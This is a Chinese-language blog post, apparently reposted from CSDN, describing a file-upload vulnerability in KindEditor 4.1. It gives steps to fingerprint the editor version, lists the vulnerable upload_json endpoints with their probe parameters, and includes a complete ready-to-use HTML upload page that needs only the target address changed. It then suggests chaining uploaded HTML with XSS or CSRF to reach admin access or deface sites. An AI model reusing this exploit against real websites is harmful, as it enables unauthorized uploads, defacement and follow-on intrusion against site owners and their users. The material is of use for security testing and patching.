kindeditor 4.1 文件上传漏洞（中危、不能拿shell）

1、漏洞问题：
Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf格式文件且上传文件地 址通常携带“/kineditor/“的关键字。
找到对应/kindeditor/目录访问kindeditor/kindediotr.js文件查看编辑器版本确定是否为存在漏洞版本
此次漏洞出现在kindeditor的upload_json文件，针对于各种脚本语言关键字为：
————————————————
版权声明：本文为CSDN博主「爱喝小米粥」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。

/asp/upload_json.asp /asp.net/upload_json.ashx /jsp/upload_json.jsp /php/upload_json.php

如访问存在该文件，查看对应关键参数是否可用，即：

kindeditor/asp/upload_json.asp?dir=file kindeditor/asp.net/upload_json.ashx?dir=file kindeditor/jsp/upload_json.jsp?dir=file kindeditor/php/upload_json.php?dir=file

如参数可用，自行构造上传页面进行上传。页面代码如下：

<html><head>
 <title>Uploader</title>
 <script src="http://www.xxx.org/kindeditor//kindeditor.js"></script>
 <script>
 KindEditor.ready(function(K) {
 var uploadbutton = K.uploadbutton({
 button : K('#uploadButton')[0],
 fieldName : 'imgFile',
 url : 'http://www.xxx.org/kindeditor/jsp/upload_json.jsp?dir=file',
afterUpload : function(data) {
 if (data.error === 0) {
 var url = K.formatUrl(data.url, 'absolute');
 K('#url').val(url);}
 },
 });
 uploadbutton.fileBox.change(function(e) {
 uploadbutton.submit();
 });
});
 </script></head><body>
 <div class="upload">
 <input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />
 <input type="button" id="uploadButton" value="Upload" />
 </div>
 </body>
</html>

注意：构造页面只需修改对应的目标关键字地址即可使用
因为该漏洞目前发现只能上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf文件，未成功绕过限制上传木马，但是可以上传自己构造的html页面，也就意味着可结合xss或者csrf等其他攻击方式去进行攻击，运气好是可以拿到后台权限的，最差也能传个黑页